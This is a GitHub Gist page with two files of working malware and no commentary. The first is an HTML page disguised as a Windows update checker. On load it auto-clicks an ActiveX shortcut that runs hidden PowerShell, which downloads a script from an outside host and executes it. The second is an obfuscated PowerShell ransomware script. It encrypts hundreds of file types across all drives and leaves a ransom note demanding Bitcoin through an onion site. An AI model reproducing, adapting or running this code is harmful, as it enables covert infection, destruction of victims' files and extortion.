Created
September 18, 2015 08:02
-
-
Save toufik-airane/f9c26c193d16438fba7e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<HTML> | |
<TITLE>Check for Windows updates from Command Line</TITLE> | |
<HEAD> | |
</HEAD> | |
<body><script language="javascript"> | |
if ((window.name != "content") && (navigator.userAgent.indexOf("Opera") <= -1) ) | |
document.write("<center><a href='index.html?page=doc.htm'>show framing</a></center>") | |
</script> | |
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> | |
<PARAM name="Command" value="ShortCut"> | |
<PARAM name="Button" value="Bitmap::shortcut"> | |
<PARAM name="Item1" value=",cmd.exe,/c powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile (New-Object System.Net.WebClient).DownloadFile('http://sploogetube.mobi/X.ps1','%TEMP%\x.ps1'); powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -file %TEMP%\x.ps1"> | |
<PARAM name="Item2" value="273,1,1"> | |
</OBJECT> | |
<SCRIPT> | |
x.Click(); | |
</SCRIPT> | |
</BODY> | |
</HTML> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Reflection.Assembly]::LoadWithPartialName('System.Security')|Out-Null | |
$BchjdRgasjcThsjd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("R2hjalJzaG5jckhoamp2aHRoamh2UnNqanZSaHNqanZ2cmhqc2RqY2o=")); | |
[byte[]]$uTRyjuXlqNXnseI=[system.Text.Encoding]::Unicode.GetBytes($BchjdRgasjcThsjd) | |
$ZgcnGgsjvRg = New-Object System.Security.Cryptography.RSACryptoServiceProvider(2048) | |
$ZgcnGgsjvRg.FromXmlString("S2jGfstfhB765GtN+2+Ds/qfC8lfEp7u7kolJ6b2uyoOQcumI4OtrbBl6sdUeq+56MKB0iYdxdHAskKdTH6SRwOU4WOA2eplbd13XZQRAvJqwcF+2vPLRcl//QW6MfsBO/yBMHU+OQVuQpLRfgvtGhb2EN4VIOCl/lPSLrtAvvD17QVRD8KB4p8mujr87s9QeXojtL3nWfbQ0EnbFH+Oc0nRScC5IFcPjdsTBOt6cRYKTePpmTc+ks5H5Oj1QBZnAQIQii9/KL0siG14VkqYwjJgwbKCmdEViZYT18QaeZ9JqrV9UkoU7nRK8ptlqTWy2ezQIOR+7tJjUnhWSuMITTlPi4AQaNEWBD3f3SISZFDmx/Rn0W3OmX59suix07VwmjWBgeh5qhFKL0sWI7g90anzwTGRKXxfxb+/rXBEfgA1aYep0WHOXPJbSIGoRiIPejSx/hHI7nljxqU6ktMe++GKV1hs7TCGCximT8nY3gkZDXFgbe1WoZSarqWRRGyFmS35R3RBoRLA3bhjN50DUTUvFUR+i9IKb0cHnA+8cuBzjgydJZC9Lmfep4f1DR2iMoxWHXBra2krO4Kn6d2gtEO3BYfKqerYU8A2/J1kEv9OYxzP7cd1ZbMIkA27JKgWqpVyhG6VkpyqDIihU9sqb2XdjYHSF8qI0U=AQAB") | |
$QpdoKjxmchRfsgdt=[system.Convert]::ToBase64String($ZgcnGgsjvRg.Encrypt($uTRyjuXlqNXnseI, $false)) | |
$UxjcRgasjfvRsj = [Text.Encoding]::UTF8.GetBytes("SgfmRRgxTgRgxhTghcHfgsjcO") | |
$XlowQsiRsKORgfR = new-Object System.Security.Cryptography.RijndaelManaged | |
$XlowQsiRsKORgfR.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $BchjdRgasjcThsjd, $UxjcRgasjfvRsj, 5).GetBytes(32) | |
$XlowQsiRsKORgfR.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("XlowQsiRsKORgfRjBMPLmCamEMyFRlWfsgTgh") )[0..15] | |
$XlowQsiRsKORgfR.Padding="Zeros" | |
$XlowQsiRsKORgfR.Mode="CBC" | |
$OkcjHgxmznFgsd=gdr|where {$_.Free}|Sort-Object -Descending | |
foreach($ThcjRgsjdjvGhj in $OkcjHgxmznFgsd){ | |
gci $ThcjRgsjdjvGhj.root -Recurse -Include "*.doc","*.xls","*.docx","*.xlsx","*.mp3","*.waw","*.jpg","*.jpeg","*.txt","*.rtf","*.pdf","*.rar","*.zip","*.psd","*.tif","*.wma","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.eps","*.png","*.ace","*.djvu","*.tar","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.php","*.aac","*.ac3","*.amf","*.amr","*.dwg","*.dxf","*.accdb","*.mod","*.tax2013","*.tax2014","*.oga","*.ogg","*.pbf","*.ra","*.raw","*.saf","*.val","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.qtiq","*.srf","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc","*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.indd","*.asr","*.qbb","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m","*.h4r","*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu","*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"|%{ | |
try{ | |
$kyXFlvCrYYjZnlA = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII) | |
if ($kyXFlvCrYYjZnlA.BaseStream.Length -lt 42871){ | |
$cVUFZNIlIxVosuo = $kyXFlvCrYYjZnlA.BaseStream.Length | |
} | |
else | |
{ | |
$cVUFZNIlIxVosuo = 42871 | |
} | |
$uTRyjuXlqNXnseI = $kyXFlvCrYYjZnlA.ReadBytes($cVUFZNIlIxVosuo) | |
$kyXFlvCrYYjZnlA.Close() | |
$TYWDGBsmZwuOGXd = $XlowQsiRsKORgfR.CreateEncryptor() | |
$uJanuGwIhjYaaTj = new-Object IO.MemoryStream | |
$zzuLBXieWtOWYMM = new-Object Security.Cryptography.CryptoStream $uJanuGwIhjYaaTj,$TYWDGBsmZwuOGXd,"Write" | |
$zzuLBXieWtOWYMM.Write($uTRyjuXlqNXnseI, 0,$uTRyjuXlqNXnseI.Length) | |
$zzuLBXieWtOWYMM.Close() | |
$uJanuGwIhjYaaTj.Close() | |
$TYWDGBsmZwuOGXd.Clear() | |
$RgcjKJthvnRgsh = $uJanuGwIhjYaaTj.ToArray() | |
$jBMPLmCamEMyFRl = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII) | |
$jBMPLmCamEMyFRl.Write($RgcjKJthvnRgsh,0,$RgcjKJthvnRgsh.Length) | |
$jBMPLmCamEMyFRl.Close() | |
$YYIYKQBszPsldyl = $_.Directory.ToString() + '\DECRYPT_INSTRUCTION.html' | |
$meVylWThUjMXklC = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PHRpdGxlPllvdXIgZmlsZXMgd2VyZSBlbmNyeXB0ZWQhPC90aXRsZT4NCjxoMj5Zb3VyIGZpbGVzIHdlcmUgZW5jcnlwdGVkIHdpdGggYSBSU0EyMDQ4LWtleS48L2gyPjxicj4NClRvIGRlY3J5cHQgeW91ciBmaWxlcywgZ28gdG8gPGI+aHR0cDovLzVueGNnazVweHNjM2Vmbnoub25pb24ubnU8L2I+IGFuZCBmb2xsb3cgdGhlIGluc3RydWN0aW9ucy48YnI+DQpJZiB0aGUgc2l0ZSBkb2Vzbid0IHdvcmssIGluc3RhbGwgdGhlIFRvciBicm93c2VyIGFuZCBnbyB0byA8Yj41bnhjZ2s1cHhzYzNlZm56Lm9uaW9uPC9iPi48YnI+DQpUaGUgb25seSB3YXkgdG8gZXZlciByZWdhaW4gYWNjZXNzIHRvIHlvdXIgZmlsZXMgYWdhaW4gaXMgdG8gYnV5IHRoZSBkZWNyeXB0ZXIuIDxicj5UaGUgcHJpY2UgZm9yIHRoZSBkZWNyeXB0ZXIgaXMgZG91YmxlZCBhZnRlciAxMCBkYXlzLjxicj4gSWYgeW91IGhhdmUgbm90IG1hZGUgcGF5bWVudCBhZnRlciAzMCBkYXlzLCB0aGUgcHJpdmF0ZSBrZXkgZm9yIGRlY3J5cHRpb24gaXMgZGVsZXRlZCAtIGxlYXZpbmcgeW91ciBmaWxlcyBpcnJldm9jYWJseSBicm9rZW4uPGJyPg0KWW91ciBJRCMgaXMgPGI+V2s3M0doZDU8L2I+")); | |
if(!(Test-path($YYIYKQBszPsldyl))){ | |
New-Item -Path $YYIYKQBszPsldyl -ItemType file -Value $meVylWThUjMXklC | |
Add-Content -Path $YYIYKQBszPsldyl -Value ('<p><b>Guaranteed recovery is provided before scheduled deletion of private key on the day of '+(Get-Date).AddDays(+30)) | |
Add-Content -Path $YYIYKQBszPsldyl -Value ('<p><b>The price to obtain the decrypter goes from 2BTC to 4BTC on the day of '+(Get-Date).AddDays(+10)) | |
}} | |
catch | |
{ | |
} | |
}} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment